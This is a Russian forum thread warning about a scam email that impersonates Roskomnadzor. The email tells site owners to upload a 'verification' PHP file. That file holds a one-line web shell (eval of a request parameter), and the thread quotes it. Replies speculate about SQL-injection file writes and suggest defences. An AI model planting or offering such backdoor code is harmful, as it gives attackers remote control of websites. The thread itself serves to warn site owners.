взломщик
Мой знакомый прислал интересную информацию 
И так на почту многим должно придти следующая информация
По истечению 72 часов, Вы, администратор доменного имени webof-sar.ru НЕ прошли верификацию, Ваш сайт webof-sar.ru может быть внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
В случае, если Вы выполнили необходимые требования, но наш робот не подтвердил верификацию, проверьте следующее:
1) Убедитесь в наличии папки reestr и файла reestr000000078827135647.php, содержащий следующий текст:
< ?php /*Подтверждение доменного имени webof-sar.ru roskomnadzor-verification = 54re00ds92167049999901257a roskomnadzor-verification2 = 54re00ds92167049999901257a / eval(stripslashes($_REQUEST[roskomnadzor])); / roskomnadzor-verification4 = 54re00ds92167049999901257a */ ?>
2) В коде< ?php необходимо убрать пробел между < и ?php , в конце текста убрать пробел между ? и >, как на картинке ниже:
Все это лохатрон... НЕ в коем случае не видитесь....!
Мне тож такие файлы заливали))) На твоём старом движке ещё....
Так что скорее всего дыра в каком то из старых твоих файлов.
со стороннего ресурса базу обновляю. Но видать проблема не в этом!
BelarusBUX.com,
2 раза такое приходило, хороший способ ))
nanotek,
да я уже все через поиски перелопатил. Самой заливки файлов нигде нет, кроме аваторок
SpawN,
Может форум?
WiNNeR_tig,
А ты чего не отвечаешь мне на сайте своём? Яж тебе про баг говорил.... а ты так и не поправил (
SpawN, а кто хостер?
по дате загруженных файлов можно в логах смотреть...
Прикрути защиту касого убери все echo о *уякинг атемптах и вместо них припиши логи какой файл пытались атаковать и прочее, парси все post cookies и headers
В конце концов вычисли ip кулхацкера и пиши в логи все его действия от входа до залития кода. Прикрути к всем post стрипслеш, скорее всего с помощью sql inj делают select into outfile
Все прекрасно знают. Что обнаружить IP это толку мало... если там хрендель реально с руками и с головой то он работает через туннель... 
потому и нет логов о заливке файла так как он вовсе не заливается а создается путем записи вредосного кода в базу через инекцию, в ячейку которая выводится в месте где нет фильтрации, и в результате код вредосный срабатывает как код а не как текст, и само собой создает шел, и удаляется с базы. Это мое мнение, хз как там, держите в курсе что там...